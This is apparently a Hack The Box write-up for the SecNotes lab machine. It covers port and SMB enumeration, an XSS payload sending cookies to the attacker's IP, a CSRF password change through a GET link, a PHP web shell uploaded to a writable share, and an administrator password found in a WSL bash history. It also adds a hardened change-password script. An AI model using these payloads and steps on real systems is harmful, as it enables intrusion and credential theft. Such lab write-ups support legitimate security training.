SecNotes

1. User

1.1. Recon

1.1.1. PortScan

Nmap done: 1 IP address (1 host up) scanned in 27.89 seconds
✓ 发现 3 个开放端口: 80,445,8808
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-31 11:14 EDT
Nmap scan report for SECNOTES.SECNOTES (10.129.31.121)
Host is up (0.062s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         Microsoft IIS httpd 10.0
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2025-10-31T15:14:49
|_  start_date: N/A
|_clock-skew: mean: 2h20m02s, deviation: 4h02m31s, median: 1s
| smb-os-discovery:
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2025-10-31T08:14:48-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.21 seconds

1.1.2. SMB

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nxc smb 10.129.31.121 -u guest -p ''
SMB         10.129.31.121   445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True) (Null Auth:True)
SMB         10.129.31.121   445    SECNOTES         [-] SECNOTES\guest: STATUS_ACCOUNT_DISABLED

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nxc smb 10.129.31.121 -u guest -p ''  --shares
SMB         10.129.31.121   445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True) (Null Auth:True)
SMB         10.129.31.121   445    SECNOTES         [-] SECNOTES\guest: STATUS_ACCOUNT_DISABLED

1.2. Web

Port 8808: default IIS landing page (screenshot).

Port 80: Secure Notes login page (screenshot).

1.2.1. Directory scan

Nothing on 8808.

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# dirsearch -u http://10.129.31.121:8808/ -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/SecNotes/reports/http_10.129.31.121_8808/__25-10-31_11-16-44.txt

Target: http://10.129.31.121:8808/

[11:16:44] Starting:

Task Completed

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# dirsearch -u http://10.129.31.121 -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/SecNotes/reports/http_10.129.31.121/_25-10-31_11-18-52.txt

Target: http://10.129.31.121/

[11:18:52] Starting:
[11:19:28] 500 -    1KB - /auth.php
[11:19:42] 500 -    1KB - /db.php
[11:19:54] 200 -    1KB - /login.php
[11:20:08] 200 -    2KB - /register.php

Task Completed

Created a user and logged in. There is a feedback form.

Tested for XSS directly:

<img src="x" onerror="this.src='http://10.10.14.67:4444/steal?cookie=' + encodeURIComponent(document.cookie)">

Then started a listener:

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nc -lvnp 4444
listening on [any] 4444 ...

Waited a while with no response.

I then tried submitting only a link and found that it does get visited:

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.67] from (UNKNOWN) [10.129.31.121] 51969
GET / HTTP/1.1
>>>> User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228
Host: 10.10.14.67:4444
Connection: Keep-Alive

The User-Agent shows that this is a server-side request (PowerShell), not a browser executing the XSS, so we will not receive the administrator's cookie.

1.3. CSRF

Capturing the request shows that the password can also be changed via GET.

The normal request is a POST (screenshot).

I changed it to a GET request and it was still accepted.

It returns to the login page, but testing confirms the change really does go through.

Submitted it directly through the feedback form:

http://10.129.31.121/change_pass.php?confirm_password=321321&password=321321&submit=submit

Then tested whether tyler's password had been changed: it was.
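As an added example (not the SecNotes application's own code), a hardened change_pass.php that closes the hole used above: state changes only over POST, a per-session CSRF token, and re-authentication with the current password. The `$pdo` connection and the `users(username, password_hash)` table are assumptions.

```php
<?php
// Added example, not the SecNotes application's code. Assumes a PDO handle in
// $pdo and a hypothetical users(username, password_hash) table.
session_start();

// Constant-time token comparison; both values must be present.
function verify_csrf_token(?string $submitted, ?string $stored): bool
{
    return is_string($submitted) && is_string($stored) && hash_equals($stored, $submitted);
}

// 1. Password changes are state-changing, so accept POST only. The original
//    accepted GET, so a link dropped into the feedback form was enough.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit('Method Not Allowed');
}
if (empty($_SESSION['username'])) {
    http_response_code(401);
    exit('Login required');
}

// 2. Per-session anti-CSRF token, issued to the form as a hidden field when
//    it is rendered: $_SESSION['csrf_token'] = bin2hex(random_bytes(32)).
if (!verify_csrf_token($_POST['csrf_token'] ?? null, $_SESSION['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Invalid CSRF token');
}

// 3. Re-authenticate with the current password, so a forged or replayed
//    request from a logged-in context still cannot rotate the credential.
$stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = ?');
$stmt->execute([$_SESSION['username']]);
$hash = $stmt->fetchColumn();
if ($hash === false || !password_verify($_POST['current_password'] ?? '', $hash)) {
    http_response_code(403);
    exit('Current password incorrect');
}

$new = $_POST['password'] ?? '';
if (strlen($new) < 12 || $new !== ($_POST['confirm_password'] ?? '')) {
    http_response_code(400);
    exit('Passwords do not match or are too short');
}
$upd = $pdo->prepare('UPDATE users SET password_hash = ? WHERE username = ?');
$upd->execute([password_hash($new, PASSWORD_DEFAULT), $_SESSION['username']]);
// 4. Rotate the token after use so the same form submission cannot be replayed.
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));
echo 'Password changed';
```

With these checks, the GET URL above is rejected at step 1, and a forged POST from a fetched link still fails at steps 2 and 3.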

Inside there are some notes; the third one contains credentials:

\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

1.4. SMB

Since 445 is open, SMB is the obvious next thing to test.

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nxc smb 10.129.31.121 -u tyler -p '92g!mA8BGjOirkL%OG*&'
SMB         10.129.31.121   445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True) (Null Auth:True)
SMB         10.129.31.121   445    SECNOTES         [+] SECNOTES\tyler:92g!mA8BGjOirkL%OG*&

Then list the shares:

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nxc smb 10.129.31.121 -u tyler -p '92g!mA8BGjOirkL%OG*&' --shares
SMB         10.129.31.121   445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True) (Null Auth:True)
SMB         10.129.31.121   445    SECNOTES         [+] SECNOTES\tyler:92g!mA8BGjOirkL%OG*&
SMB         10.129.31.121   445    SECNOTES         [*] Enumerated shares
SMB         10.129.31.121   445    SECNOTES         Share           Permissions     Remark
SMB         10.129.31.121   445    SECNOTES         -----           -----------     ------
SMB         10.129.31.121   445    SECNOTES         ADMIN$                          Remote Admin
SMB         10.129.31.121   445    SECNOTES         C$                              Default share
SMB         10.129.31.121   445    SECNOTES         IPC$            READ            Remote IPC
SMB         10.129.31.121   445    SECNOTES         new-site        READ,WRITE

Upload a webshell directly:

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# impacket-smbclient 'tyler:92g!mA8BGjOirkL%OG*&@10.129.31.121'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use new-site
# ls
drw-rw-rw-          0  Fri Oct 31 12:55:34 2025 .
drw-rw-rw-          0  Fri Oct 31 12:55:34 2025 ..
-rw-rw-rw-        696  Thu Jun 21 16:15:36 2018 iisstart.htm
-rw-rw-rw-      98757  Thu Jun 21 16:15:38 2018 iisstart.png
# put p0wnyshell.php
# ls
drw-rw-rw-          0  Fri Oct 31 12:57:03 2025 .
drw-rw-rw-          0  Fri Oct 31 12:57:03 2025 ..
-rw-rw-rw-        696  Thu Jun 21 16:15:36 2018 iisstart.htm
-rw-rw-rw-      98757  Thu Jun 21 16:15:38 2018 iisstart.png
-rw-rw-rw-      15207  Fri Oct 31 12:57:04 2025 p0wnyshell.php

Then browse to http://10.129.31.121:8808/p0wnyshell.php and pop a shell from there.

PS C:\users> tree /f /a
Folder PATH listing
Volume serial number is 1E7B-9B76
C:.
+---Administrator
+---DefaultAppPool
+---new
+---newsite
+---Public
+---tyler
|   |   .php_history
|   |   0
|   |
|   +---3D Objects
|   +---cleanup
|   |       cleanup.ps1
|   |
|   +---Contacts
|   +---Desktop
|   |       bash.lnk
|   |       Command Prompt.lnk
|   |       File Explorer.lnk
|   |       Microsoft Edge.lnk
|   |       Notepad++.lnk
|   |       user.txt
|   |       Windows PowerShell.lnk
|   |
|   +---Documents
|   +---Downloads
|   +---Favorites
|   |   |   Bing.url
|   |   |
|   |   \---Links
|   +---Links
|   |       Desktop.lnk
|   |       Downloads.lnk
|   |
|   +---Music
|   +---OneDrive
|   +---Pictures
|   |   +---Camera Roll
|   |   \---Saved Pictures
|   +---Saved Games
|   +---Searches
|   |       winrt--{S-1-5-21-1791094074-1363918840-4199337083-1002}-.searchconnector-ms
|   |
|   +---secnotes_contacts
|   |       check-messages-orig.ps1
|   |       check-messages.ps1
|   |
|   \---Videos
\---wayne

1.5. WSL2 file system

Look at the .lnk files:

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# cat bash.lnk
(binary .lnk content; the readable strings include the target C:\Windows\System32\bash.exe)

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# cat Windows\ PowerShell.lnk
(binary .lnk content; the readable strings include the target C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)

There is a C:\Windows\System32\bash.exe.

This is presumably a hint to look at the bash (WSL) filesystem on Windows.
For the now-popular WSL2, the bash filesystem is usually found at a path like the following:

C:\Users\<username>\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_*\LocalState\rootfs\

Here: C:\users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
da----        6/21/2018   6:03 PM                bin
da----        6/21/2018   6:00 PM                boot
da----        6/21/2018   6:00 PM                dev
da----        6/22/2018   3:00 AM                etc
da----        6/21/2018   6:00 PM                home
da----        6/21/2018   6:00 PM                lib
da----        6/21/2018   6:00 PM                lib64
da----        6/21/2018   6:00 PM                media
da----        6/21/2018   6:03 PM                mnt
da----        6/21/2018   6:00 PM                opt
da----        6/21/2018   6:00 PM                proc
da----        6/22/2018   2:44 PM                root
da----        6/21/2018   6:00 PM                run
da----        6/22/2018   2:57 AM                sbin
da----        6/21/2018   6:00 PM                snap
da----        6/21/2018   6:00 PM                srv
da----        6/21/2018   6:00 PM                sys
da----        6/22/2018   2:25 PM                tmp
da----        6/21/2018   6:02 PM                usr
da----        6/21/2018   6:03 PM                var
-a----       10/31/2025  10:30 AM          87944 init
PS C:\users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> type .bash_history

cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
>>>> smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exit

Found the administrator password:

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nxc smb 10.129.31.121 -u administrator -p 'u6!4ZwgwOM#^OBf#Nwnh' --shares
SMB         10.129.31.121   445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True) (Null Auth:True)
SMB         10.129.31.121   445    SECNOTES         [+] SECNOTES\administrator:u6!4ZwgwOM#^OBf#Nwnh (Pwn3d!)
SMB         10.129.31.121   445    SECNOTES         [*] Enumerated shares
SMB         10.129.31.121   445    SECNOTES         Share           Permissions     Remark
SMB         10.129.31.121   445    SECNOTES         -----           -----------     ------
SMB         10.129.31.121   445    SECNOTES         ADMIN$          READ,WRITE      Remote Admin
SMB         10.129.31.121   445    SECNOTES         C$              READ,WRITE      Default share
SMB         10.129.31.121   445    SECNOTES         IPC$            READ            Remote IPC
SMB         10.129.31.121   445    SECNOTES         new-site

C$ is accessible over SMB:

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# impacket-smbclient 'administrator:u6!4ZwgwOM#^OBf#Nwnh@10.129.31.121'

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use c$
# cd users
# cd administrator
# cd desktop
# get root.txt

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# cat root.txt
5f1ee3842e0f37a08abf9d459e6659d7